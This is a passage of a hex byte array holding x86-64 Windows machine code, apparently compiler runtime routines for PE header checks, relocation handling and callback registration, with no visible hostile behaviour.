x85,0x78,0x02,0x00,0x00,0x48,0x85,0xC0,0x74,0x24,0x48,0x8B,0x9D,0x78,0x02,0x00,0x00,0x48,0x8B,0x05,0xB3,0xA2,0x00,0x00,0xFF,0xD0,0x49,0x89,0xD8,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0xAF,0xA2,0x00,0x00,0xFF,0xD0,0x48,0x8B,0x85,0x80,0x02,0x00,0x00,0x8B,0x95,0x9C,0x02,0x00,0x00,0x48,0x89,0xC1,0xE8,0x07,0xFA,0xFF,0xFF,0x48,0x8B,0x85,0x80,0x02,0x00,0x00,0x48,0x85,0xC0,0x74,0x0F,0x48,0x8B,0x85,0x80,0x02,0x00,0x00,0x48,0x89,0xC1,0xE8,0x57,0xF9,0xFF,0xFF,0x48,0x8B,0x85,0x80,0x02,0x00,0x00,0x48,0x85,0xC0,0x74,0x0F,0x48,0x8B,0x85,0x80,0x02,0x00,0x00,0x48,0x89,0xC1,0xE8,0x30,0xC1,0xFF,0xFF,0x8B,0x85,0x9C,0x02,0x00,0x00,0x48,0x81,0xC4,0x20,0x03,0x00,0x00,0x5B,0x5F,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x20,0x48,0x89,0x4D,0x10,0x89,0x55,0x18,0x4C,0x89,0x45,0x20,0x83,0x7D,0x18,0x03,0x74,0x25,0x83,0x7D,0x18,0x03,0x77,0x26,0x83,0x7D,0x18,0x02,0x74,0x1C,0x83,0x7D,0x18,0x02,0x77,0x1A,0x83,0x7D,0x18,0x00,0x74,0x13,0x83,0x7D,0x18,0x01,0x75,0x0E,0xE8,0xED,0xFA,0xFF,0xFF,0xEB,0x07,0x90,0xEB,0x04,0x90,0xEB,0x01,0x90,0xB8,0x01,0x00,0x00,0x00,0x48,0x83,0xC4,0x20,0x5D,0xC3,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x20,0x48,0x8B,0x05,0x21,0x20,0x00,0x00,0x48,0x8B,0x00,0x48,0x85,0xC0,0x74,0x26,0x66,0x0F,0x1F,0x84,0x00,0x00,0x00,0x00,0x00,0xFF,0xD0,0x48,0x8B,0x05,0x07,0x20,0x00,0x00,0x48,0x8D,0x50,0x08,0x48,0x8B,0x40,0x08,0x48,0x89,0x15,0xF8,0x1F,0x00,0x00,0x48,0x85,0xC0,0x75,0xE3,0x48,0x83,0xC4,0x20,0x5D,0xC3,0x66,0x66,0x2E,0x0F,0x1F,0x84,0x00,0x00,0x00,0x00,0x00,0x66,0x90,0x55,0x56,0x53,0x48,0x83,0xEC,0x20,0x48,0x8D,0x6C,0x24,0x20,0x48,0x8B,0x15,0x0D,0x39,0x00,0x00,0x48,0x8B,0x02,0x89,0xC1,0x83,0xF8,0xFF,0x74,0x43,0x85,0xC9,0x74,0x22,0x89,0xC8,0x83,0xE9,0x01,0x48,0x8D,0x1C,0xC2,0x48,0x29,0xC8,0x48,0x8D,0x74,0xC2,0xF8,0x66,0x0F,0x1F,0x44,0x00,0x00,0xFF,0x13,0x48,0x83,0xEB,0x08,0x48,0x39,0xF3,0x75,0xF5,0x48,0x8D,0x0D,0x66,0xFF,0xFF,0xFF,0x48,0x83,0xC4,0x20,0x5B,0x5E,0x5D,0xE9,0xDA,0x32,0xFF,0xFF,0x66,0x2E,0x0F,0x1F,0x84,0x00,0x00,0x00,0x00,0x00,0x31,0xC0,0x66,0x0F,0x1F,0x44,0x00,0x00,0x44,0x8D,0x40,0x01,0x89,0xC1,0x4A,0x83,0x3C,0xC2,0x00,0x4C,0x89,0xC0,0x75,0xF0,0xEB,0xA3,0x66,0x0F,0x1F,0x44,0x00,0x00,0x8B,0x05,0xEA,0x81,0x00,0x00,0x85,0xC0,0x74,0x06,0xC3,0x0F,0x1F,0x44,0x00,0x00,0xC7,0x05,0xD6,0x81,0x00,0x00,0x01,0x00,0x00,0x00,0xE9,0x61,0xFF,0xFF,0xFF,0x90,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x20,0x83,0xFA,0x03,0x74,0x13,0x85,0xD2,0x74,0x0F,0xB8,0x01,0x00,0x00,0x00,0x48,0x83,0xC4,0x20,0x5D,0xC3,0x0F,0x1F,0x40,0x00,0xE8,0x8B,0x07,0x00,0x00,0xB8,0x01,0x00,0x00,0x00,0x48,0x83,0xC4,0x20,0x5D,0xC3,0x55,0x56,0x53,0x48,0x83,0xEC,0x20,0x48,0x8D,0x6C,0x24,0x20,0x48,0x8B,0x05,0x2D,0x38,0x00,0x00,0x83,0x38,0x02,0x74,0x06,0xC7,0x00,0x02,0x00,0x00,0x00,0x83,0xFA,0x02,0x74,0x15,0x83,0xFA,0x01,0x74,0x48,0xB8,0x01,0x00,0x00,0x00,0x48,0x83,0xC4,0x20,0x5B,0x5E,0x5D,0xC3,0x0F,0x1F,0x00,0x48,0x8D,0x1D,0x11,0xAF,0x00,0x00,0x48,0x8D,0x35,0x0A,0xAF,0x00,0x00,0x48,0x39,0xF3,0x74,0xDD,0x0F,0x1F,0x44,0x00,0x00,0x48,0x8B,0x03,0x48,0x85,0xC0,0x74,0x02,0xFF,0xD0,0x48,0x83,0xC3,0x08,0x48,0x39,0xF3,0x75,0xED,0xB8,0x01,0x00,0x00,0x00,0x48,0x83,0xC4,0x20,0x5B,0x5E,0x5D,0xC3,0xE8,0x0B,0x07,0x00,0x00,0xB8,0x01,0x00,0x00,0x00,0x48,0x83,0xC4,0x20,0x5B,0x5E,0x5D,0xC3,0x66,0x66,0x2E,0x0F,0x1F,0x84,0x00,0x00,0x00,0x00,0x00,0x0F,0x1F,0x00,0x31,0xC0,0xC3,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x55,0x56,0x53,0x48,0x83,0xEC,0x30,0x48,0x8D,0x6C,0x24,0x30,0x48,0x89,0xCB,0x48,0x8D,0x45,0x28,0xB9,0x02,0x00,0x00,0x00,0x48,0x89,0x55,0x28,0x4C,0x89,0x45,0x30,0x4C,0x89,0x4D,0x38,0x48,0x89,0x45,0xF8,0xE8,0x73,0x0C,0x00,0x00,0x41,0xB8,0x1B,0x00,0x00,0x00,0xBA,0x01,0x00,0x00,0x00,0x48,0x8D,0x0D,0x01,0x36,0x00,0x00,0x49,0x89,0xC1,0xE8,0x49,0x0E,0x00,0x00,0x48,0x8B,0x75,0xF8,0xB9,0x02,0x00,0x00,0x00,0xE8,0x4B,0x0C,0x00,0x00,0x48,0x89,0xDA,0x48,0x89,0xC1,0x49,0x89,0xF0,0xE8,0x9D,0x0E,0x00,0x00,0xE8,0x10,0x0E,0x00,0x00,0x90,0x0F,0x1F,0x80,0x00,0x00,0x00,0x00,0x55,0x57,0x56,0x53,0x48,0x83,0xEC,0x58,0x48,0x8D,0x6C,0x24,0x50,0x48,0x63,0x35,0xC0,0x80,0x00,0x00,0x48,0x89,0xCB,0x85,0xF6,0x0F,0x8E,0x11,0x01,0x00,0x00,0x48,0x8B,0x05,0xB2,0x80,0x00,0x00,0x45,0x31,0xC9,0x48,0x83,0xC0,0x18,0x0F,0x1F,0x00,0x4C,0x8B,0x00,0x4C,0x39,0xC3,0x72,0x13,0x48,0x8B,0x50,0x08,0x8B,0x52,0x08,0x49,0x01,0xD0,0x4C,0x39,0xC3,0x0F,0x82,0x88,0x00,0x00,0x00,0x41,0x83,0xC1,0x01,0x48,0x83,0xC0,0x28,0x41,0x39,0xF1,0x75,0xD8,0x48,0x89,0xD9,0xE8,0x40,0x08,0x00,0x00,0x48,0x89,0xC7,0x48,0x85,0xC0,0x0F,0x84,0xE6,0x00,0x00,0x00,0x48,0x8B,0x05,0x65,0x80,0x00,0x00,0x48,0x8D,0x1C,0xB6,0x48,0xC1,0xE3,0x03,0x48,0x01,0xD8,0x48,0x89,0x78,0x20,0xC7,0x00,0x00,0x00,0x00,0x00,0xE8,0x53,0x09,0x00,0x00,0x8B,0x57,0x0C,0x41,0xB8,0x30,0x00,0x00,0x00,0x48,0x8D,0x0C,0x10,0x48,0x8B,0x05,0x37,0x80,0x00,0x00,0x48,0x8D,0x55,0xD0,0x48,0x89,0x4C,0x18,0x18,0xFF,0x15,0x58,0x9F,0x00,0x00,0x48,0x85,0xC0,0x0F,0x84,0x7E,0x00,0x00,0x00,0x8B,0x45,0xF4,0x8D,0x50,0xFC,0x83,0xE2,0xFB,0x74,0x08,0x8D,0x50,0xC0,0x83,0xE2,0xBF,0x75,0x14,0x83,0x05,0x01,0x80,0x00,0x00,0x01,0x48,0x83,0xC4,0x58,0x5B,0x5E,0x5F,0x5D,0xC3,0x0F,0x1F,0x40,0x00,0x83,0xF8,0x02,0x48,0x8B,0x4D,0xD0,0x48,0x8B,0x55,0xE8,0x41,0xB8,0x40,0x00,0x00,0x00,0xB8,0x04,0x00,0x00,0x00,0x44,0x0F,0x44,0xC0,0x48,0x03,0x1D,0xD7,0x7F,0x00,0x00,0x48,0x89,0x4B,0x08,0x49,0x89,0xD9,0x48,0x89,0x53,0x10,0xFF,0x15,0xEE,0x9E,0x00,0x00,0x85,0xC0,0x75,0xB6,0xFF,0x15,0x94,0x9E,0x00,0x00,0x48,0x8D,0x0D,0x25,0x35,0x00,0x00,0x89,0xC2,0xE8,0x66,0xFE,0xFF,0xFF,0x66,0x0F,0x1F,0x44,0x00,0x00,0x31,0xF6,0xE9,0x21,0xFF,0xFF,0xFF,0x48,0x8B,0x05,0x9A,0x7F,0x00,0x00,0x8B,0x57,0x08,0x48,0x8D,0x0D,0xC8,0x34,0x00,0x00,0x4C,0x8B,0x44,0x18,0x18,0xE8,0x3E,0xFE,0xFF,0xFF,0x48,0x89,0xDA,0x48,0x8D,0x0D,0x94,0x34,0x00,0x00,0xE8,0x2F,0xFE,0xFF,0xFF,0x90,0x66,0x66,0x2E,0x0F,0x1F,0x84,0x00,0x00,0x00,0x00,0x00,0x0F,0x1F,0x00,0x55,0x41,0x57,0x41,0x56,0x41,0x55,0x41,0x54,0x57,0x56,0x53,0x48,0x83,0xEC,0x48,0x48,0x8D,0x6C,0x24,0x40,0x44,0x8B,0x25,0x44,0x7F,0x00,0x00,0x45,0x85,0xE4,0x74,0x17,0x48,0x8D,0x65,0x08,0x5B,0x5E,0x5F,0x41,0x5C,0x41,0x5D,0x41,0x5E,0x41,0x5F,0x5D,0xC3,0x66,0x0F,0x1F,0x44,0x00,0x00,0xC7,0x05,0x1E,0x7F,0x00,0x00,0x01,0x00,0x00,0x00,0xE8,0x69,0x07,0x00,0x00,0x48,0x98,0x48,0x8D,0x04,0x80,0x48,0x8D,0x04,0xC5,0x0F,0x00,0x00,0x00,0x48,0x83,0xE0,0xF0,0xE8,0xB2,0x09,0x00,0x00,0x4C,0x8B,0x2D,0x7B,0x35,0x00,0x00,0x48,0x8B,0x1D,0x84,0x35,0x00,0x00,0xC7,0x05,0xEE,0x7E,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0x29,0xC4,0x48,0x8D,0x44,0x24,0x30,0x48,0x89,0x05,0xE3,0x7E,0x00,0x00,0x4C,0x89,0xE8,0x48,0x29,0xD8,0x48,0x83,0xF8,0x07,0x7E,0x90,0x8B,0x13,0x48,0x83,0xF8,0x0B,0x0F,0x8F,0x03,0x01,0x00,0x00,0x8B,0x03,0x85,0xC0,0x0F,0x85,0x69,0x02,0x00,0x00,0x8B,0x43,0x04,0x85,0xC0,0x0F,0x85,0x5E,0x02,0x00,0x00,0x8B,0x53,0x08,0x83,0xFA,0x01,0x0F,0x85,0x92,0x02,0x00,0x00,0x48,0x83,0xC3,0x0C,0x4C,0x39,0xEB,0x0F,0x83,0x56,0xFF,0xFF,0xFF,0x4C,0x8B,0x35,0x3E,0x35,0x00,0x00,0x41,0xBF,0xFF,0xFF,0xFF,0xFF,0xEB,0x65,0x66,0x0F,0x1F,0x44,0x00,0x00,0x83,0xF9,0x08,0x0F,0x84,0xD7,0x00,0x00,0x00,0x83,0xF9,0x10,0x0F,0x85,0x50,0x02,0x00,0x00,0x0F,0xB7,0x37,0x81,0xE2,0xC0,0x00,0x00,0x00,0x66,0x85,0xF6,0x0F,0x89,0xCC,0x01,0x00,0x00,0x48,0x81,0xCE,0x00,0x00,0xFF,0xFF,0x48,0x29,0xC6,0x4C,0x01,0xCE,0x85,0xD2,0x75,0x12,0x48,0x81,0xFE,0x00,0x80,0xFF,0xFF,0x7C,0x65,0x48,0x81,0xFE,0xFF,0xFF,0x00,0x00,0x7F,0x5C,0x48,0x89,0xF9,0xE8,0x61,0xFD,0xFF,0xFF,0x66,0x89,0x37,0x48,0x83,0xC3,0x0C,0x4C,0x39,0xEB,0x0F,0x83,0xD1,0x00,0x00,0x00,0x8B,0x03,0x8B,0x53,0x08,0x8B,0x7B,0x04,0x4C,0x01,0xF0,0x0F,0xB6,0xCA,0x4C,0x8B,0x08,0x4C,0x01,0xF7,0x83,0xF9,0x20,0x0F,0x84,0x0C,0x01,0x00,0x00,0x76,0x82,0x83,0xF9,0x40,0x0F,0x85,0xDB,0x01,0x00,0x00,0x48,0x8B,0x37,0x89,0xD1,0x48,0x29,0xC6,0x4C,0x01,0xCE,0x81,0xE1,0xC0,0x00,0x00,0x00,0x0F,0x85,0x42,0x01,0x00,0x00,0x48,0x85,0xF6,0x78,0xAF,0x48,0x89,0x74,0x24,0x20,0x89,0xCA,0x49,0x89,0xF8,0x48,0x8D,0x0D,0xD4,0x33,0x00,0x00,0xE8,0x87,0xFC,0xFF,0xFF,0x0F,0x1F,0x80,0x00,0x00,0x00,0x00,0x85,0xD2,0x0F,0x85,0x68,0x01,0x00,0x00,0x8B,0x43,0x04,0x89,0xC2,0x0B,0x53,0x08,0x0F,0x85,0xF4,0xFE,0xFF,0xFF,0x48,0x83,0xC3,0x0C,0xE9,0xDE,0xFE,0xFF,0xFF,0x90,0x0F,0xB6,0x37,0x81,0xE2,0xC0,0x00,0x00,0x00,0x40,0x84,0xF6,0x0F,0x89,0x26,0x01,0x00,0x00,0x48,0x81,0xCE,0x00,0xFF,0xFF,0xFF,0x48,0x29,0xC6,0x4C,0x01,0xCE,0x85,0xD2,0x75,0x0F,0x48,0x81,0xFE,0xFF,0x00,0x00,0x00,0x7F,0x97,0x48,0x83,0xFE,0x80,0x7C,0x91,0x48,0x89,0xF9,0x48,0x83,0xC3,0x0C,0xE8,0x92,0xFC,0xFF,0xFF,0x40,0x88,0x37,0x4C,0x39,0xEB,0x0F,0x82,0x35,0xFF,0xFF,0xFF,0x66,0x0F,0x1F,0x44,0x00,0x00,0x8B,0x15,0x4E,0x7D,0x00,0x00,0x85,0xD2,0x0F,0x8E,0x03,0xFE,0xFF,0xFF,0x48,0x8B,0x35,0x6B,0x9C,0x00,0x00,0x31,0xDB,0x48,0x8D,0x7D,0xFC,0x0F,0x1F,0x44,0x00,0x00,0x48,0x8B,0x05,0x31,0x7D,0x00,0x00,0x48,0x01,0xD8,0x44,0x8B,0x00,0x45,0x85,0xC0,0x74,0x0D,0x48,0x8B,0x50,0x10,0x48,0x8B,0x48,0x08,0x49,0x89,0xF9,0xFF,0xD6,0x41,0x83,0xC4,0x01,0x48,0x83,0xC3,0x28,0x44,0x3B,0x25,0x06,0x7D,0x00,0x00,0x7C,0xD0,0xE9,0xBC,0xFD,0xFF,0xFF,0x0F,0x1F,0x00,0x8B,0x37,0x81,0xE2,0xC0,0x00,0x00,0x00,0x85,0xF6,0x79,0x74,0x49,0xBB,0x00,0x00,0x00,0x00,0xFF,0xFF,0xFF,0xFF,0x4C,0x09,0xDE,0x48,0x29,0xC6,0x4C,0x01,0xCE,0x85,0xD2,0x75,0x1C,0x4C,0x39,0xFE,0x0F,0x8F,0xEF,0xFE,0xFF,0xFF,0x48,0xB8,0xFF,0xFF,0xFF,0x7F,0xFF,0xFF,0xFF,0xFF,0x48,0x39,0xC6,0x0F,0x8E,0xDC,0xFE,0xFF,0xFF,0x48,0x89,0xF9,0xE8,0xE1,0xFB,0xFF,0xFF,0x89,0x37,0xE9,0x7C,0xFE,0xFF,0xFF,0x66,0x2E,0x0F,0x1F,0x84,0x00,0x00,0x00,0x00,0x00,0x48,0x89,0xF9,0xE8,0xC8,0xFB,0xFF,0xFF,0x48,0x89,0x37,0xE9,0x62,0xFE,0xFF,0xFF,0x48,0x29,0xC6,0x4C,0x01,0xCE,0x85,0xD2,0x0F,0x84,0x37,0xFE,0xFF,0xFF,0xE9,0x44,0xFE,0xFF,0xFF,0x0F,0x1F,0x44,0x00,0x00,0x48,0x29,0xC6,0x4C,0x01,0xCE,0x85,0xD2,0x74,0x99,0xEB,0xB3,0x0F,0x1F,0x40,0x00,0x48,0x29,0xC6,0x4C,0x01,0xCE,0x85,0xD2,0x0F,0x84,0xDD,0xFE,0xFF,0xFF,0xE9,0xE7,0xFE,0xFF,0xFF,0x0F,0x1F,0x44,0x00,0x00,0x4C,0x39,0xEB,0x0F,0x83,0x08,0xFD,0xFF,0xFF,0x4C,0x8B,0x35,0xF0,0x32,0x00,0x00,0x8B,0x73,0x04,0x8B,0x3B,0x48,0x83,0xC3,0x08,0x4C,0x01,0xF6,0x03,0x3E,0x48,0x89,0xF1,0xE8,0x5A,0xFB,0xFF,0xFF,0x89,0x3E,0x4C,0x39,0xEB,0x72,0xE3,0xE9,0xCE,0xFE,0xFF,0xFF,0x89,0xCA,0x48,0x8D,0x0D,0xED,0x31,0x00,0x00,0xE8,0xD0,0xFA,0xFF,0xFF,0x48,0x8D,0x0D,0xA9,0x31,0x00,0x00,0xE8,0xC4,0xFA,0xFF,0xFF,0x90,0x90,0x90,0x90,0x55,0x41,0x55,0x41,0x54,0x57,0x56,0x53,0x48,0x83,0xEC,0x28,0x48,0x8D,0x6C,0x24,0x20,0x4C,0x8D,0x2D,0x28,0x7C,0x00,0x00,0x4C,0x89,0xE9,0xFF,0x15,0xB7,0x9A,0x00,0x00,0x48,0x8B,0x1D,0xF8,0x7B,0x00,0x00,0x48,0x85,0xDB,0x74,0x38,0x4C,0x8B,0x25,0xF4,0x9A,0x00,0x00,0x48,0x8B,0x3D,0xA5,0x9A,0x00,0x00,0x0F,0x1F,0x44,0x00,0x00,0x8B,0x0B,0x41,0xFF,0xD4,0x48,0x89,0xC6,0xFF,0xD7,0x48,0x85,0xF6,0x74,0x0D,0x85,0xC0,0x75,0x09,0x48,0x8B,0x43,0x08,0x48,0x89,0xF1,0xFF,0xD0,0x48,0x8B,0x5B,0x10,0x48,0x85,0xDB,0x75,0xDB,0x4C,0x89,0xE9,0x48,0x83,0xC4,0x28,0x5B,0x5E,0x5F,0x41,0x5C,0x41,0x5D,0x5D,0x48,0xFF,0x25,0x8D,0x9A,0x00,0x00,0x0F,0x1F,0x44,0x00,0x00,0x55,0x57,0x56,0x53,0x48,0x83,0xEC,0x28,0x48,0x8D,0x6C,0x24,0x20,0x8B,0x05,0x95,0x7B,0x00,0x00,0x89,0xCF,0x48,0x89,0xD6,0x85,0xC0,0x75,0x14,0x31,0xC0,0x48,0x83,0xC4,0x28,0x5B,0x5E,0x5F,0x5D,0xC3,0x66,0x0F,0x1F,0x84,0x00,0x00,0x00,0x00,0x00,0xBA,0x18,0x00,0x00,0x00,0xB9,0x01,0x00,0x00,0x00,0xE8,0x81,0x08,0x00,0x00,0x48,0x89,0xC3,0x48,0x85,0xC0,0x74,0x33,0x48,0x89,0x70,0x08,0x48,0x8D,0x35,0x6E,0x7B,0x00,0x00,0x89,0x38,0x48,0x89,0xF1,0xFF,0x15,0xFB,0x99,0x00,0x00,0x48,0x8B,0x05,0x3C,0x7B,0x00,0x00,0x48,0x89,0xF1,0x48,0x89,0x1D,0x32,0x7B,0x00,0x00,0x48,0x89,0x43,0x10,0xFF,0x15,0x10,0x9A,0x00,0x00,0xEB,0xA2,0x83,0xC8,0xFF,0xEB,0x9F,0x90,0x55,0x56,0x53,0x48,0x83,0xEC,0x20,0x48,0x8D,0x6C,0x24,0x20,0x8B,0x05,0x16,0x7B,0x00,0x00,0x89,0xCB,0x85,0xC0,0x75,0x10,0x31,0xC0,0x48,0x83,0xC4,0x20,0x5B,0x5E,0x5D,0xC3,0x66,0x0F,0x1F,0x44,0x00,0x00,0x48,0x8D,0x35,0x11,0x7B,0x00,0x00,0x48,0x89,0xF1,0xFF,0x15,0xA0,0x99,0x00,0x00,0x48,0x8B,0x0D,0xE1,0x7A,0x00,0x00,0x48,0x85,0xC9,0x74,0x2F,0x31,0xD2,0xEB,0x13,0x0F,0x1F,0x84,0x00,0x00,0x00,0x00,0x00,0x48,0x89,0xCA,0x48,0x85,0xC0,0x74,0x1B,0x48,0x89,0xC1,0x8B,0x01,0x39,0xD8,0x48,0x8B,0x41,0x10,0x75,0xEB,0x48,0x85,0xD2,0x74,0x26,0x48,0x89,0x42,0x10,0xE8,0xD5,0x07,0x00,0x00,0x48,0x89,0xF1,0xFF,0x15,0x8C,0x99,0x00,0x00,0x31,0xC0,0x48,0x83,0xC4,0x20,0x5B,0x5E,0x5D,0xC3,0x66,0x2E,0x0F,0x1F,0x84,0x00,0x00,0x00,0x00,0x00,0x48,0x89,0x05,0x89,0x7A,0x00,0x00,0xEB,0xD5,0x0F,0x1F,0x80,0x00,0x00,0x00,0x00,0x55,0x53,0x48,0x83,0xEC,0x28,0x48,0x8D,0x6C,0x24,0x20,0x83,0xFA,0x02,0x0F,0x84,0xAC,0x00,0x00,0x00,0x77,0x2A,0x85,0xD2,0x74,0x46,0x8B,0x05,0x68,0x7A,0x00,0x00,0x85,0xC0,0x0F,0x84,0xB8,0x00,0x00,0x00,0xC7,0x05,0x56,0x7A,0x00,0x00,0x01,0x00,0x00,0x00,0xB8,0x01,0x00,0x00,0x00,0x48,0x83,0xC4,0x28,0x5B,0x5D,0xC3,0x66,0x90,0x83,0xFA,0x03,0x75,0xED,0x8B,0x05,0x3D,0x7A,0x00,0x00,0x85,0xC0,0x74,0xE3,0xE8,0x0C,0xFE,0xFF,0xFF,0xEB,0xDC,0x66,0x2E,0x0F,0x1F,0x84,0x00,0x00,0x00,0x00,0x00,0x8B,0x05,0x22,0x7A,0x00,0x00,0x85,0xC0,0x75,0x6E,0x8B,0x05,0x18,0x7A,0x00,0x00,0x83,0xF8,0x01,0x75,0xBD,0x48,0x8B,0x1D,0x04,0x7A,0x00,0x00,0x48,0x85,0xDB,0x74,0x18,0x0F,0x1F,0x80,0x00,0x00,0x00,0x00,0x48,0x89,0xD9,0x48,0x8B,0x5B,0x10,0xE8,0x14,0x07,0x00,0x00,0x48,0x85,0xDB,0x75,0xEF,0x48,0x8D,0x0D,0x00,0x7A,0x00,0x00,0x48,0xC7,0x05,0xD5,0x79,0x00,0x00,0x00,0x00,0x00,0x00,0xC7,0x05,0xD3,0x79,0x00,0x00,0x00,0x00,0x00,0x00,0xFF,0x15,0x75,0x98,0x00,0x00,0xE9,0x72,0xFF,0xFF,0xFF,0xE8,0x3B,0x04,0x00,0x00,0xB8,0x01,0x00,0x00,0x00,0x48,0x83,0xC4,0x28,0x5B,0x5D,0xC3,0x0F,0x1F,0x80,0x00,0x00,0x00,0x00,0xE8,0x83,0xFD,0xFF,0xFF,0xEB,0x8B,0x90,0x48,0x8D,0x0D,0xB9,0x79,0x00,0x00,0xFF,0x15,0x73,0x98,0x00,0x00,0xE9,0x36,0xFF,0xFF,0xFF,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x31,0xC0,0x66,0x81,0x39,0x4D,0x5A,0x75,0x0F,0x48,0x63,0x51,0x3C,0x48,0x01,0xD1,0x81,0x39,0x50,0x45,0x00,0x00,0x74,0x08,0xC3,0x0F,0x1F,0x80,0x00,0x00,0x00,0x00,0x31,0xC0,0x66,0x81,0x79,0x18,0x0B,0x02,0x0F,0x94,0xC0,0xC3,0x0F,0x1F,0x40,0x00,0x48,0x63,0x41,0x3C,0x48,0x01,0xC1,0x0F,0xB7,0x41,0x14,0x44,0x0F,0xB7,0x41,0x06,0x48,0x8D,0x44,0x01,0x18,0x66,0x45,0x85,0xC0,0x74,0x32,0x41,0x8D,0x48,0xFF,0x48,0x8D,0x0C,0x89,0x4C,0x8D,0x4C,0xC8,0x28,0x0F,0x1F,0x84,0x00,0x00,0x00,0x00,0x00,0x44,0x8B,0x40,0x0C,0x4C,0x89,0xC1,0x4C,0x39,0xC2,0x72,0x08,0x03,0x48,0x08,0x48,0x39,0xCA,0x72,0x0B,0x48,0x83,0xC0,0x28,0x4C,0x39,0xC8,0x75,0xE3,0x31,0xC0,0xC3,0x55,0x57,0x56,0x53,0x48,0x83,0xEC,0x28,0x48,0x8D,0x6C,0x24,0x20,0x48,0x89,0xCE,0xE8,0x63,0x06,0x00,0x00,0x48,0x83,0xF8,0x08,0x77,0x7D,0x48,0x8B,0x15,0x6E,0x2F,0x00,0x00,0x31,0xDB,0x66,0x81,0x3A,0x4D,0x5A,0x75,0x5B,0x48,0x63,0x42,0x3C,0x48,0x01,0xD0,0x81,0x38,0x50,0x45,0x00,0x00,0x75,0x4C,0x66,0x81,0x78,0x18,0x0B,0x02,0x75,0x44,0x0F,0xB7,0x50,0x14,0x48,0x8D,0x5C,0x10,0x18,0x0F,0xB7,0x50,0x06,0x66,0x85,0xD2,0x74,0x44,0x8D,0x42,0xFF,0x48,0x8D,0x04,0x80,0x48,0x8D,0x7C,0xC3,0x28,0xEB,0x0F,0x66,0x0F,0x1F,0x44,0x00,0x00,0x48,0x83,0xC3,0x28,0x48,0x39,0xFB,0x74,0x27,0x41,0xB8,0x08,0x00,0x00,0x00,0x48,0x89,0xF2,0x48,0x89,0xD9,0xE8,0xFE,0x05,0x00,0x00,0x85,0xC0,0x75,0xE2,0x48,0x89,0xD8,0x48,0x83,0xC4,0x28,0x5B,0x5E,0x5F,0x5D,0xC3,0x66,0x0F,0x1F,0x44,0x00,0x00,0x31,0xDB,0x48,0x89,0xD8,0x48,0x83,0xC4,0x28,0x5B,0x5E,0x5F,0x5D,0xC3,0x66,0x2E,0x0F,0x1F,0x84,0x00,0x00,0x00,0x00,0x00,0x48,0x8B,0x15,0xD9,0x2E,0x00,0x00,0x31,0xC0,0x66,0x81,0x3A,0x4D,0x5A,0x75,0x10,0x4C,0x63,0x42,0x3C,0x49,0x01,0xD0,0x41,0x81,0x38,0x50,0x45,0x00,0x00,0x74,0x08,0xC3,0x0F,0x1F,0x80,0x00,0x00,0x00,0x00,0x66,0x41,0x81,0x78,0x18,0x0B,0x02,0x75,0xEF,0x41,0x0F,0xB7,0x40,0x14,0x48,0x29,0xD1,0x49,0x8D,0x44,0x00,0x18,0x45,0x0F,0xB7,0x40,0x06,0x66,0x45,0x85,0xC0,0x74,0x34,0x41,0x8D,0x50,0xFF,0x48,0x8D,0x14,0x92,0x4C,0x8D,0x4C,0xD0,0x28,0x66,0x2E,0x0F,0x1F,0x84,0x00,0x00,0x00,0x00,0x00,0x44,0x8B,0x40,0x0C,0x4C,0x89,0xC2,0x4C,0x39,0xC1,0x72,0x08,0x03,0x50,0x08,0x48,0x39,0xD1,0x72,0xAC,0x48,0x83,0xC0,0x28,0x4C,0x39,0xC8,0x75,0xE3,0x31,0xC0,0xC3,0x48,0x8B,0x05,0x59,0x2E,0x00,0x00,0x31,0xC9,0x66,0x81,0x38,0x4D,0x5A,0x75,0x0F,0x48,0x63,0x50,0x3C,0x48,0x01,0xD0,0x81,0x38,0x50,0x45,0x00,0x00,0x74,0x09,0x89,0xC8,0xC3,0x66,0x0F,0x1F,0x44,0x00,0x00,0x66,0x81,0x78,0x18,0x0B,0x02,0x75,0xEF,0x0F,0xB7,0x48,0x06,0x89,0xC8,0xC3,0x66,0x0F,0x1F,0x84,0x00,0x00,0x00,0x00,0x00,0x4C,0x8B,0x05,0x19,0x2E,0x00,0x00,0x31,0xC0,0x66,0x41,0x81,0x38,0x4D,0x5A,0x75,0x0F,0x49,0x63,0x50,0x3C,0x4C,0x01,0xC2,0x81,0x3A,0x50,0x45,0x00,0x00,0x74,0x08,0xC3,0x0F,0x1F,0x80,0x00,0x00,0x00,0x00,0x66,0x81,0x7A,0x18,0x0B,0x02,0x75,0xF0,0x0F,0xB7,0x42,0x14,0x44,0x0F,0xB7,0x42,0x06,0x48,0x8D,0x44,0x02,0x18,0x66,0x45,0x85,0xC0,0x74,0x2C,0x41,0x8D,0x50,0xFF,0x48,0x8D,0x14,0x92,0x48,0x8D,0x54,0xD0,0x28,0x0F,0x1F,0x80,0x00,0x00,0x00,0x00,0xF6,0x40,0x27,0x20,0x74,0x09,0x48,0x85,0xC9,0x74,0xBD,0x48,0x83,0xE9,0x01,0x48,0x83,0xC0,0x28,0x48,0x39,0xC2,0x75,0xE8,0x31,0xC0,0xC3,0x66,0x66,0x2E,0x0F,0x1F,0x84,0x00,0x00,0x00,0x00,0x00,0x66,0x90,0x48,0x8B,0x05,0x99,0x2D,0x00,0x00,0x31,0xD2,0x66,0x81,0x38,0x4D,0x5A,0x75,0x0F,0x48,0x63,0x48,0x3C,0x48,0x01,0xC1,0x81,0x39,0x50,0x45,0x00,0x00,0x74,0x09,0x48,0x89,0xD0,0xC3,0x0F,0x1F,0x44,0x00,0x00,0x66,0x81,0x79,0x18,0x0B,0x02,0x48,0x0F,0x44,0xD0,0x48,0x89,0xD0,0xC3,0x66,0x2E,0x0F,0x1F,0x84,0x00,0x00,0x00,0x00,0x00,0x48,0x8B,0x15,0x59,0x2D,0x00,0x00,0x31,0xC0,0x66,0x81,0x3A,0x4D,0x5A,0x75,0x10,0x4C,0x63,0x42,0x3C,0x49,0x01,0xD0,0x41,0x81,0x38,0x50,0x45,0x00,0x00,0x74,0x08,0xC3,0x0F,0x1F,0x80,0x00,0x00,0x00,0x00,0x66,0x41,0x